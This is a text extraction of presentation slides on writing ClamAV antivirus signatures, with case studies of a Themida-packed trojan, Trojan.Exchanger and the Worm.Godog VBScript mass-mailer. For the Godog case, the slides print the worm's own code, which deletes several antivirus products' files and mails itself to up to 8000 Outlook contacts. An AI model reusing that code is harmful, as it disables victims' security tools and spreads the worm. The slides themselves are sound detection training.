8. ClamAV malware detection
Goal: recognize and block malware
Detection is:
• File-centric
• Focus on recognizing malicious code in file
Not intended to replace desktop AV
First line of defense
8
9. ClamAV Virus Database (CVD)
The ClamAV project distributes two CVD files
• main.cvd
• daily.cvd
Sigtool (ships with ClamAV) can display
detailed information on CVD files:
9
12. Hash database: *.hdb
The format for .hdb files is as follows:
• MD5:Size:MalwareName
To create a signature for test.exe use the --md5
option of sigtool:
12
13. Hash database: *.hdb (cont’d)
That’s it! The signature is ready to be used:
• The name for the detection can be changed:
13
14. MD5, PE-section based: *.mdb
The format for .mdb files is as follows:
• PESectionSize:MD5:MalwareName
The easiest way to generate MD5 based
section signatures is to extract target PE
sections into separate files and then run sigtool
with the option -- mdb:
14
15. Case study: Trojan.Bagle-328
IDA Pro indicates that the sample is “packed”
Packed with Themida (as per PEiD)
15
16. Case study: Trojan.Bagle-328
(cont'd)
Themida is used by malware writers...but
also by legitimate products – false positive
likely
We can use pe-sig, a Ruby script that will
create sigs for each section of a PE file:
Finally, the signature is:
• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
16
17. Extended sig. format: *.ndb
The format for .ndb files is as follows:
• MalwareName:TargetType:Offset:HexSignature
• TargetType is one of the following
numbers specifying the type of the target
file:
0: Any file 4: Mail File
1: Portable Executable 5: Graphics
2: OLE2 component (eg: VBA script) 6: ELF
3: HTML (normalized) 7: ASCII text file (normalized)
17
21. Case study: Trojan.Exchanger
(cont’d)
Signature for 5.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature for 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature to detect both 5.exe and 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
21
22. Case study: Trojan.Exchanger
(cont’d)
Moreover, for 5.exe:
• EP: 0x4094E0
• Binary string: 0x4095C5
For 7.exe:
• EP: 0x406D87
• Binary string: 0x406E6C
In both cases the distance between EP and our
binary string is the same: 0xE5 = 229 (decimal)
22
23. Case study: Trojan.Exchanger
(cont’d)
Finally we can rewrite the signature to be:
• Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
This signature is more precise and even
matches other samples:
23
24. Logical signatures: *.ldb
Logical signatures introduced in ClamAV 0.94
The format for .ldb files is as follows:
• SignatureName;TargetDescriptionBlock;LogicalExpr
ession;Subsig0;Subsig1;Subsig2;...
24
25. Case study: Worm.Godog
A mass-mailer worm, code is in VBS
Registro = legion.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")
If FileExists (Registro & "Kaspersky LabKaspersky Antivirus Personal ProAvp32.exe") then path = Registro &
"Kaspersky LabKaspersky Antivirus Personal Pro"
legions.DeleteFile (Registro & "Kaspersky LabKaspersky Antivirus Personal Pro*.*")
If fileexists (Registro & "Kaspersky LabKaspersky Antivirus PersonalAvp32.exe") then path = Registro &
"Kaspersky LabKaspersky Antivirus Personal"
legions.DeleteFile (Registro & "Kaspersky LabKaspersky Antivirus Personal*.*")
if FileExists(Registro & "Antiviral Toolkit Proavp32.exe") then path = Registros & "Antiviral Toolkit Pro"
legions.DeleteFile (Registro & "Antiviral Toolkit Pro*.*")
if fileexists (Registro & "AVPersonalAvguard.exe") then path = Registro & "AVPersonal"
legions.DeleteFile (Registro & "AVPersonal*.*")
if fileexists (Registro & "Trend PC-cillin 98IOMON98.EXE") then path = Registro & "Trend PC-cillin 98"
legions.DeleteFile (Registro & "Trend PC-cillin 98*.*")
legions.DeleteFile (Registro & "Trend PC-cillin 98*.EXE")
legions.DeleteFile (Registro & "Trend PC-cillin 98*.dll")
25
26. Case study: Worm.Godog
(cont’d)
After normalization, we can create 4 signatures
to detect each attempt to disable AV tools as
follows:
(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
{-100}2e64656c65746566696c652028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028
{-25}202620225c6176706572736f6e616c
(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e
{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
26
27. Case study: Worm.Godog
(cont’d)
Worm also send itself to the first 8000 contacts
found in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject")
Set mail = Create.CreateTextFile("C:mail.vbs")
mail.writeline "On Error Resume Next"
mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
mail.writeline "For A = 1 To Mail.AddressLists.Count"
mail.writeline "Set B = Mail.AddressLists (A)"
mail.writeline "Counter = 1"
mail.writeline "Set C = leg.CreateItem (0)"
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "Counter = Counter + 1"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "Next"
mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:Legion.vbs" & Chr(34)
mail.writeline "C.DeleteAfterSubmit = True"
mail.writeline "C.Send"
mail.writeline "Next"
mail.Close
legion.Run ("C:mail.vbs")
27
28. Case study: Worm.Godog
(cont’d)
A signature to detect this worm portion of the
file could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74
{-100}726563697069656e74732e616464{-100}696620{-10}203e20
{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464
{-150}2e73656e64
Finally, we can write this highly flexible
signature:
• Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4)
in a .ldb file:
Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c ;66696c6565786973747328{-
25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-
25}202620225c616e7469766972616c20746f6f6c6b69742070726f; 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-
100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c; 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-
100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e ;666f7220{-10}203d203120746f20{-
10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-
300}2e6174746163686d656e74732e616464{-150}2e73656e64
28
29. Whitelisting
To whitelist a specific file create an entry in a
database file with the extension of .fp following
the MD5 signature format:
• MD5:FileSize:Comment
29
30. Whitelisting (cont’d)
To whitelist a specific signature inside
main.cvd add the following entry into a local
file local.ign:
• db_name:line_number:signature_name
To ignore the “myTestSignature” at line 23 in
test.ndb:
• test.ndb:23:myTestSignature
Daily.ign:
30
31. More questions?
clamav-users@lists.clamav.net - user
questions
clamav-devel@lists.clamav.net - technical
discussions
Alternatively you can try asking on the
#clamav IRC channel on irc.freenode.net
If you have questions or comments on this
presentation: azidouemba@sourcefire.com
31